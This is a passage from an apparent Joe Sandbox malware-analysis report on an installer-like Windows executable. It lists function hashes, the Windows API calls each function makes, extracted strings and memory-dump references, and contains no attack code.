                                                  • Opcode ID: b91d4fce54392df2e97de7bc6d207c8acd76fc29859b80508349f43d92bd930d
                                                  • Instruction ID: ba38e0c37d2c4a0677a1b8c3a3e2c5b81f52bfc6e6322859571237bcba2cc6eb
                                                  • Opcode Fuzzy Hash: b91d4fce54392df2e97de7bc6d207c8acd76fc29859b80508349f43d92bd930d
                                                  • Instruction Fuzzy Hash: E5310271A05A19ABD2202B219C49F6B3AACDF45754F14043AFD01B62D2D6BCBD018EBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FC0
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FD2
                                                  • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405FE2
                                                  Strings
                                                  • "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", xrefs: 00405FA4
                                                  • *?|<>/":, xrefs: 00405FB0
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-2201247274
                                                  • Opcode ID: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                  • Instruction ID: ae1ae60f73f04b2279d28dd2d3a2e9c8876d1ac92d72727c270a9fd7cf783979
                                                  • Opcode Fuzzy Hash: 630e707e10dd61a13617e1da554c627d06d49c30f7de44bbd37dfc38f3dae12c
                                                  • Instruction Fuzzy Hash: 75119451908B932DEB3216254C44BBB7F99CF56760F18047BE9C4722C2D6BC9C429B7D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                  • GetLastError.KERNEL32 ref: 00405433
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405448
                                                  • GetLastError.KERNEL32 ref: 00405452
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: ,s@$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-2165210743
                                                  • Opcode ID: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                  • Instruction ID: 949b07086bfbcc12ad21f83970ad7e8279e58ae06bb45438fc5c1603e332b0fc
                                                  • Opcode Fuzzy Hash: c1937cb38bbd103373e168b49ea038f7d2b8a7083c118a1d29bd15b4f0e45592
                                                  • Instruction Fuzzy Hash: 2D010871D14259EADF119BA0DD447EFBFB8EB04355F004176E904B6181E3789648CFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F66
                                                  • GetSysColor.USER32(00000000), ref: 00403F82
                                                  • SetTextColor.GDI32(?,00000000), ref: 00403F8E
                                                  • SetBkMode.GDI32(?,?), ref: 00403F9A
                                                  • GetSysColor.USER32(?), ref: 00403FAD
                                                  • SetBkColor.GDI32(?,?), ref: 00403FBD
                                                  • DeleteObject.GDI32(?), ref: 00403FD7
                                                  • CreateBrushIndirect.GDI32(?), ref: 00403FE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                  • Instruction ID: 69fcdb6fe5d9844d1d3a4f02655feb6370c96159658ebf8fe0858d801e39bc44
                                                  • Opcode Fuzzy Hash: 43ad35625e8825ecd6a842b2a86c8fc2a15ebd27dc521d874f6abe6132d0b03d
                                                  • Instruction Fuzzy Hash: 5A215471904705ABCB219F78DD48F4BBFF8AF01715B048A29F895E22E0D735EA04CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047FC
                                                  • GetMessagePos.USER32 ref: 00404804
                                                  • ScreenToClient.USER32(?,?), ref: 0040481E
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404830
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404856
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                  • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                  • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                  • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                  • MulDiv.KERNEL32(000C3F95,00000064,000C3F99), ref: 00402BC5
                                                  • wsprintfA.USER32 ref: 00402BD5
                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402BCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                  • Instruction ID: 2606314667324be55f41e30219fef3bc9394611b5aff82d746d43452e3b9cc2b
                                                  • Opcode Fuzzy Hash: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                  • Instruction Fuzzy Hash: 9901FF71540208BBEF109F60DD0AFEE3BB9EB04305F008039FA16B51E1D7B9A955DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D3B
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                  • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Times New Roman
                                                  • API String ID: 3808545654-927190056
                                                  • Opcode ID: 405e53858b96f349ff943583813b342f0df48d702d6f0c4f2847402c23a08874
                                                  • Instruction ID: 9e7a7182ae9254896fc63aeedc32ca6a3ce3e3ef4d7c41cc1e10fd7b3e73fcff
                                                  • Opcode Fuzzy Hash: 405e53858b96f349ff943583813b342f0df48d702d6f0c4f2847402c23a08874
                                                  • Instruction Fuzzy Hash: 59016232944340AFE7016B70AE5EBA93FA89795305F10C475F201B62E2C57801569F7F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                  • Instruction ID: c72a82ba9ad54cd79da2f6af8e35d97bfd0db4c8549b0f23667d21b619a0d1b1
                                                  • Opcode Fuzzy Hash: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                  • Instruction Fuzzy Hash: 9E215C71C01124BBCF216FA5DE89EAEBA79EF05324F10423AF910762E1C7794D418FA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(Nonefficient Setup: Completed,Nonefficient Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                  • wsprintfA.USER32 ref: 0040477D
                                                  • SetDlgItemTextA.USER32(?,Nonefficient Setup: Completed), ref: 00404790
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$Nonefficient Setup: Completed
                                                  • API String ID: 3540041739-898682354
                                                  • Opcode ID: 2d636fce24791288b272f48c44559ee7df443eeeabb6113edb092f8abbd0bf81
                                                  • Instruction ID: fde7fbcda73e06f71546803af61accc205d2577e4f834e35a140aa318663f7c1
                                                  • Opcode Fuzzy Hash: 2d636fce24791288b272f48c44559ee7df443eeeabb6113edb092f8abbd0bf81
                                                  • Instruction Fuzzy Hash: 3411E773A0412877DB10666D9C45EAF3288DB86374F254237FA26F31D1EA788C1281F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                  • Instruction ID: 77b923b5c768d409b2d5e956d577938eeee851e691c4f647a4d397fc18f4a02c
                                                  • Opcode Fuzzy Hash: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                  • Instruction Fuzzy Hash: 10113D71A00108BEDF229F90DE89DAE3B7DEB54349B504436FA01F10A0D775AE51DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                  • Instruction ID: 593f524f0f56d60e1fc11a8a6bbc9e15f3312f291ea64c997066006724e53d58
                                                  • Opcode Fuzzy Hash: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                  • Instruction Fuzzy Hash: FEF03CB2A04114AFEB01ABE4DE88CAF77BCEB54301B004476F601F6190C7749D018B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetWindowTextA.USER32(00000000,00422F20), ref: 004039DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$1033$Nonefficient Setup: Completed
                                                  • API String ID: 530164218-3840824985
                                                  • Opcode ID: cac771c12f9d26aaba27c7f97aced8e21b7c01c0de3e01bb5d1af4f0863655d6
                                                  • Instruction ID: 76705a7a5afea2c6a0eacb6801383c1eecc8e18f8899786da29e176716c049bd
                                                  • Opcode Fuzzy Hash: cac771c12f9d26aaba27c7f97aced8e21b7c01c0de3e01bb5d1af4f0863655d6
                                                  • Instruction Fuzzy Hash: 5211F6F1B04611ABCB209F15DD80A737B6CEBC5716328823FE90167394C67D9E029AAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405775
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040577E
                                                  • lstrcatA.KERNEL32(?,00409014), ref: 0040578F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
